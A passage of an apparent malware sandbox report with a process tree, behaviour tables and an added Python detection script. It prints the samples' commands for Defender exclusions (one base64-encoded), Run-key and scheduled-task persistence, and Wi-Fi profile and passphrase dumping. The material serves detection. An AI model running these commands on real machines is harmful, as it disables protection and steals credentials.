| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Explorer.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings | C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings | C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}\Instance\ | C:\Windows\Explorer.EXE | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\4363463463464363463463463\Files\freedom.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\rundll32.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
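The behaviour tables above list the living-off-the-land binaries the samples leaned on (tasklist, taskkill, netsh, schtasks, attrib, ping, reg, timeout, wmic, powershell) but, for most of them, no command line. The process tree that follows supplies the command lines for some, notably `powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath ...` and `-ExclusionProcess ...`, which carve Microsoft Defender exclusions for the dropped payloads, and `C:\Windows\rundll32.exe` running from outside System32. The Python below is an added example, not part of the report: a small rule set run over constructed process-creation records (Sysmon Event ID 1 style `Image` / `CommandLine` / `ParentImage` fields). The command lines of records 0, 1, 7 and 8 are taken from the report's process tree; every other field and record is constructed to match the tools the report names, since the report does not give those command lines.

```python
"""Triage process-creation records for the LOLBin patterns in this report.

Added example, not part of the report. Records are constructed to mirror the
tools and command lines the sandbox observed.
"""
import ntpath
import re

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
# Binaries that have no business running from anywhere but the system dirs.
SYSTEM_ONLY = {"rundll32.exe", "svchost.exe", "msiexec.exe", "netsh.exe", "schtasks.exe",
               "cmd.exe", "powershell.exe", "attrib.exe", "tasklist.exe", "taskkill.exe"}
# Admin tools whose signal value depends on who launched them.
LOLBINS = {"powershell.exe", "netsh.exe", "schtasks.exe", "attrib.exe", "taskkill.exe",
           "tasklist.exe", "reg.exe", "wmic.exe", "systeminfo.exe"}
USER_WRITABLE = re.compile(r"\\users\\|\\appdata\\|\\programdata\\|\\temp\\|\\windows\\tasks\\", re.I)
SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3}


def basename(path):
    return ntpath.basename(path).lower()


def in_system_dir(path):
    d = ntpath.dirname(path).lower()
    return any(d == s or d.startswith(s + "\\") for s in SYSTEM_DIRS)


def tokens(r):
    return r["CommandLine"].lower().split()


def defender_exclusion(r):
    cl = r["CommandLine"].lower()
    return (basename(r["Image"]) in {"powershell.exe", "pwsh.exe"}
            and ("add-mppreference" in cl or "set-mppreference" in cl)
            and any(f in cl for f in ("-exclusionpath", "-exclusionprocess",
                                     "-exclusionextension", "-disablerealtimemonitoring")))


def wifi_profile_enum(r):
    t = tokens(r)
    return (basename(r["Image"]) == "netsh.exe" and "wlan" in t and "show" in t
            and any(x.startswith("profile") for x in t))


def wifi_key_clear(r):                       # dumps the stored Wi-Fi passphrase
    return wifi_profile_enum(r) and "key=clear" in tokens(r)


def firewall_add(r):
    t = tokens(r)
    return basename(r["Image"]) == "netsh.exe" and "firewall" in t and "add" in t


def system_binary_misplaced(r):              # e.g. C:\Windows\rundll32.exe
    return basename(r["Image"]) in SYSTEM_ONLY and not in_system_dir(r["Image"])


def task_from_user_path(r):
    cl = r["CommandLine"].lower()
    return basename(r["Image"]) == "schtasks.exe" and "/create" in cl and bool(USER_WRITABLE.search(cl))


def attrib_hide_system(r):
    t = tokens(r)
    return basename(r["Image"]) == "attrib.exe" and "+h" in t and "+s" in t


def lolbin_from_user_path(r):
    return basename(r["Image"]) in LOLBINS and bool(USER_WRITABLE.search(r["ParentImage"]))


RULES = [  # (name, severity, predicate)
    ("defender_exclusion_added", "high", defender_exclusion),
    ("wifi_profile_key_clear", "high", wifi_key_clear),
    ("system_binary_outside_system_dir", "high", system_binary_misplaced),
    ("firewall_rule_added", "medium", firewall_add),
    ("scheduled_task_user_writable_path", "medium", task_from_user_path),
    ("attrib_hidden_system", "medium", attrib_hide_system),
    ("wifi_profile_enumeration", "medium", wifi_profile_enum),
    ("lolbin_spawned_from_user_path", "low", lolbin_from_user_path),
]


def triage(records):
    """One hit per (record, rule) match; highest severity first, then record order."""
    hits = [{"index": i, "image": r["Image"], "rule": name, "severity": sev}
            for i, r in enumerate(records) for name, sev, pred in RULES if pred(r)]
    hits.sort(key=lambda h: (-SEVERITY_RANK[h["severity"]], h["index"]))
    return hits


def verdict(records):
    hits = triage(records)
    return hits[0]["severity"] if hits else "clean"


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DROP = r"C:\Users\Admin\Desktop\New Text Document mod.exse\a"
RECORDS = [  # command lines of 0, 1, 7, 8 from the report; everything else constructed
    {"Image": PS, "ParentImage": DROP + r"\x.exe",
     "CommandLine": PS + r" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath '" + DROP + r"\x.exe'"},
    {"Image": PS, "ParentImage": DROP + r"\x.exe",
     "CommandLine": PS + r" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'"},
    {"Image": r"C:\Windows\rundll32.exe", "CommandLine": r"C:\Windows\rundll32.exe",
     "ParentImage": r"C:\Users\Admin\Desktop\4363463463464363463463463\Files\njrat.exe"},
    {"Image": r"C:\Windows\system32\netsh.exe", "CommandLine": "netsh wlan show profiles",
     "ParentImage": r"C:\Windows\system32\cmd.exe"},
    {"Image": r"C:\Windows\system32\netsh.exe", "ParentImage": r"C:\Windows\system32\cmd.exe",
     "CommandLine": 'netsh wlan show profile name="Home" key=clear'},
    {"Image": r"C:\Windows\SysWOW64\schtasks.exe", "ParentImage": DROP + r"\ctx.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 1 /tn Gxtuum /tr "' + DROP + r'\ctx.exe"'},
    {"Image": r"C:\Windows\system32\attrib.exe", "CommandLine": r"attrib +h +s C:\Windows\sysnldcvmr.exe",
     "ParentImage": r"C:\Users\Admin\AppData\Local\Temp\347814563.exe"},
    {"Image": r"C:\Windows\system32\cmd.exe", "CommandLine": r'C:\Windows\system32\cmd.exe /c "ver"',
     "ParentImage": DROP + r"\system32.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding"},
    {"Image": r"C:\Windows\SysWOW64\tasklist.exe", "CommandLine": "tasklist",
     "ParentImage": r"C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe"},
]

if __name__ == "__main__":
    for h in triage(RECORDS):
        print(f"[{h['severity']:6}] #{h['index']} {h['rule']}: {h['image']}")
```

The records for `cmd.exe /c "ver"` and the COM-server rundll32 launch produce no hits, which is the point of keying on parent path and on the binary's directory rather than on the tool name alone. On a live host, the exclusions the report's PowerShell commands created are visible in `Get-MpPreference` (`ExclusionPath`, `ExclusionProcess`) and are logged by Defender as Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log.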
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\241127-xqsswsslej_pw_infected.zip"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\" -spe -an -ai#7zMap10417:140:7zEvent8427
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\*\" -spe -an -ai#7zMap1429:384:7zEvent28339
C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe"
C:\Users\Admin\AppData\Local\Temp\347814563.exe
C:\Users\Admin\AppData\Local\Temp\347814563.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\TestExe.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\TestExe.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\PDFReader.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\PDFReader.exe"
C:\Windows\sysnldcvmr.exe
C:\Windows\sysnldcvmr.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe'
C:\Users\Admin\AppData\Local\Temp\614016133.exe
C:\Users\Admin\AppData\Local\Temp\614016133.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\zts.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\zts.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5720 -ip 5720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 440
C:\Users\Admin\Desktop\4363463463464363463463463\Files\build2.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\build2.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\GoogleUpdate.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\GoogleUpdate.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla-stage2.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla-stage2.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\test.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\test.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe'
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Program Files\Google\Chrome\Application\SS0T34UUZ0O3B.exe
"C:\Program Files\Google\Chrome\Application\SS0T34UUZ0O3B.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f"
C:\Windows\system32\reg.exe
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAUAByAG8AZAB1AGMAdAAuAGUAeABlADsA
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f
C:\Users\Admin\Desktop\4363463463464363463463463\Files\build2.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\build2.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\GoogleUpdate.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\GoogleUpdate.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\zts.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\zts.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 7296 -ip 7296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7296 -s 440
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\1989810276.exe
C:\Users\Admin\AppData\Local\Temp\1989810276.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Program Files\Google\Chrome\Application\DQMX7GNJJKEGRVV.exe
"C:\Program Files\Google\Chrome\Application\DQMX7GNJJKEGRVV.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Update.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Update.exe"
C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
C:\Windows\system32\msiexec.exe
"C:\Windows\system32\msiexec.exe"
C:\Windows\system32\audiodg.exe
"C:\Windows\system32\audiodg.exe"
C:\Users\Admin\AppData\Local\Temp\6538.tmp.ssg.exe
"C:\Users\Admin\AppData\Local\Temp\6538.tmp.ssg.exe"
C:\Users\Admin\AppData\Local\Temp\78F1.tmp.zx.exe
"C:\Users\Admin\AppData\Local\Temp\78F1.tmp.zx.exe"
C:\Users\Admin\AppData\Local\Temp\78F1.tmp.zx.exe
"C:\Users\Admin\AppData\Local\Temp\78F1.tmp.zx.exe"
C:\Users\Admin\AppData\Local\MethodSignature\tzemsotp\Product.exe
C:\Users\Admin\AppData\Local\MethodSignature\tzemsotp\Product.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Documents\OUCH_SOKHENG.pdf"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=18CFB69F07F724E709E4166368633D9D --mojo-platform-channel-handle=1764 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
